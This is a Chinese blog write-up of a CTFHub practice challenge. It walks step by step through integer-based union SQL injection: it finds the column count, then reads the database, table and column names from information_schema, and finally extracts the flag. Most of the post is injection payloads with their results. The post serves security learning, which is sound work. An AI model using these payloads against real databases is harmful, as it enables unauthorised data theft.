Feb 24 2022

CTFHub_2017-赛客夏令营-Web-injection(常规sql注入)

作者: 绝缘体..   发布: 2022-02-24 09:07   分类: 未分类   阅读:   抢沙发  
 
更多

启动靶场,显示如下

根据题目名与url中的GET传参判断应该为注入

1.判断为整形注入
输入'(单引号)        --无回显
输入1 or 1=1        --有回显

2.尝试查看列数,判断有2列
1 order by 2        --有回显
1 order by 3        --无回显

3.判断其回显点位
1111 union select 1,2    --回显2

4.查询当前数据库名
1111 union select 1,database()  --回显ctfhub

5.查询表名
1111 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfhub'   --回显flag,info

6.查询列名
1111 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'   --回显flag

7.查询flag列中的内容
id=1111 union select 1,flag from ctfhub.flag
打赏

本文固定链接: https://www.cxy163.net/archives/4750 | 绝缘体

该日志由 绝缘体.. 于 2022年02月24日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: CTFHub_2017-赛客夏令营-Web-injection(常规sql注入) | 绝缘体
关键字: , , , ,
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. 百万数据查询优化技巧
  2. SQL中的Invalid column name无效列名错误如何
  3. Redis缓存穿透、击穿、雪崩解决方案:从布隆过滤
  4. MySQL:MySQL explain 详解
  5. Mybatis-plus条件构造器用法详解
  6. MongoDB 查看执行计划:explain()
  7. 数据库表设计的冗余与规范化原则
  8. css代码中定义变量
  9. MySQL的慢查询日志
  10. mysql json 数据结构查询
  11. 数据库设计的冗余与一致性
  12. 数据库表设计的冗余和性能优化
  13. MySQL 8.0高性能数据库调优最佳实践:索引优化
  14. 如何解决SQL查询中的条件限制错误Condition L
  15. php判断远程文件是否存在的办法
  16. Yii2 查询条件使用总结

CTFHub_2017-赛客夏令营-Web-injection(常规sql注入):等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter